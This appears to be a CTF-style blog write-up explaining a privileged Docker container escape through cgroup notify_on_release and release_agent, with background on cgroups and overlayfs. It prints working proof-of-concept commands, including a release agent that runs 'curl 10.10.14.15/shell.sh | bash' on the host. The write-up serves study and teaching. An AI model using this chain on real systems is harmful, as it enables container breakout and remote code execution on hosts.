Digging into cgroups Escape
The method I used in Ready to get code execution on the host system from a docker container running as privileged was a series of bash commands that didn’t make any sense on first glance. I wanted to dive into them and see what was happening under the hood.
Background
POCs
The privileged Docker container escape POC I used looked like this:
root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.15/shell.sh | bash' >/c;
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
To explain how this works, I’ll use a slightly different version of the POC (from the same article) because it’s a bit easier to follow:
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "curl 10.10.14.15/shell.sh | bash" >> /cmd
chmod a+x /cmd
sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"
Both POCs take the same steps:
- Find or create an access to the RDMA cgroup controller.
- Create a new cgroup within that controller.
- Register
notify_on_release
for that cgroup, and set the release agent to a file accessible via both the container and host. - Start a quickly completing process within that cgroup that triggers execution of the release agent on termination.
cgroups
The first thing to understand is the idea of cgroups. It’s a Linux kernel feature that isolates CPU (and other resource) usage to a collection of processes within the cgroup. Julia Evans has a zine describing cgroups:
cgroups are not exclusive to Docker, but they are used by Docker. This neat Medium post on Docker Internals goes into a lot more detail about how Docker uses cgroups for resource allocation.
overlayfs
The other concept that comes into play here is overlayfs, a “union mount filesystem” implementation in Linux. In overlayfs, there are two directories, upper and lower, that are merged to create another directory that represents the combination of the two. Julia Evans has another really helpful zine for overlayfs (she’s such a good resource!):
Julia has a post that goes into more detail with examples as well. The idea is that you can mount two file paths such that they create a third merged result. For example, the lower might be a container base image, and the upper might be changes made inside the container. In the merged result, if the file exists in both upper and lower, it shows the one from upper. If it doesn’t exist in upper, it shows the one from lower.
What’s important to know here is that by leaking the host’s filepath to the upper directory used for the docker container, I can write something in the container, and know where it will be on the host.
Steps
Find / Create cgroup Controller
The first two commands (of three) in the first line in the POC is creating a directory, and mounting it as an RDMA cgroup controller (mount -t cgroup -o rdma
):
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
It uses the RDMA cgroup, but others would works as well (there’s a list in the cgroups man page). In the Trail of Bits post they show an error that comes up when there is no RDMA cgroup, and suggest just changing rdma
to memory
to continue in another cgroup.
The original POC finds an existing mount of the rdma cgroup controller using a somewhat obfuscated ls
command:
root@gitlab:~# dirname $(ls -x /s*/fs/c*/*/r* |head -n1)
/sys/fs/cgroup/rdma
cgroup controllers are global resources, and mounting it again here inside the container gives access to the same controller in the host. Changes made here will be reflected in the host’s RDMA controller. Without being privileged, a container won’t have access to this.
Create New cgroup
Next, each POC creates a cgroup (directory) in that mount, x
(or w
in the original POC):
mkdir /tmp/cgrp/x
or
mkdir -p $d/w;
On just creating the directory, several files are created:
root@gitlab:~# ls /tmp/cgrp/x/
cgroup.clone_children notify_on_release rdma.max
cgroup.procs rdma.current tasks
Configure Release
The next command is to write a 1 to notifiy_on_release
, which enables cgroup notifications on release:
If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the "release_agent" file in that hierarchy's root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup.
In each POC:
echo 1 > /tmp/cgrp/x/notify_on_release
or
echo 1 >$d/w/notify_on_release
The majority of the remaining commands are dedicated to setting the release agent. This is what will get run on the release notification. First, the POC needs to find the mapping so that the host can reference a file written in the container. /etc/mtab
has a list of all the mount points for the system, to include the overlayfs mount:
root@gitlab:~# grep upper /etc/mtab
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/GIXQ4D2FJ63I5OGALTCGDBK6KT:/var/lib/docker/overlay2/l/PZB5MARGIAOF6N5AAJNTVUFS52:/var/lib/docker/overlay2/l/4KSUGTOLFYSBJFJQH2NUGVL54R:/var/lib/docker/overlay2/l/PJ4IKL6MDRM2ZSGFRAXCVHVLUR:/var/lib/docker/overlay2/l/XLLFVBBMKEEE672BOIVTSZ5XQZ:/var/lib/docker/overlay2/l/33JTQXWWPTNINADNR6R3YM47KY:/var/lib/docker/overlay2/l/XG5BUSKVZNINSBJD2J7MMLU5A3:/var/lib/docker/overlay2/l/ZI5Y7RO6WUTDK3DQVTUTOA2ZWI:/var/lib/docker/overlay2/l/SRZJCUXAPFOW35HRDPW7OHQWXN:/var/lib/docker/overlay2/l/SLR2WWC4VRYMZRPZ6EHZQSLNYS:/var/lib/docker/overlay2/l/SJBEI24D42KKTO5Z54GMKQPPXO,upperdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff,workdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/work,xino=off 0 0
The next command in the POC uses sed
to get just the string that is the upperdir
path:
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
Running that shows where on the host filesystem the container files are:
root@gitlab:~# sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab
/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff
As an experiment, I’ll create a file in the root home dir on the container:
root@gitlab:~# echo "0xdf was here" > 0xdf
With an SSH shell as root on the host, I can see that file shows up in the upperdir
:
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# ls
bin etc home opt root root_pass run tmp usr var
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# cd root/
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# ls
0xdf
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# cat 0xdf
0xdf was here
This helps because now I can write the release agent script (a simple reverse shell) in the container, and then call it from the host. That’s what the next few commands do. Set the file from the host’s perspective as the release_agent
:
echo "$host_path/cmd" > /tmp/cgrp/release_agent
Write the reverse shell from within the container:
echo '#!/bin/sh' > /cmd
echo "curl 10.10.14.15/shell.sh | bash" >> /cmd
chmod a+x /cmd
Trigger Release
Now everything is set up so that when a process within this new cgroup terminates, it will execute the reverse shell. All I need to do now is start a process within that cgroup and then let it finish. The POC makes use of a neat trick to do that. It starts an echo
process, and has that process output the PID of that process into the cgroups.procs
file:
sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"
This leads to the PID being in that file, and then that echo
completing, which terminates the process. The system sees that PID terminate, and finds it’s PID in the x
cgroup. It removes that PID from the cgroups.procs
file, and triggers the release agent.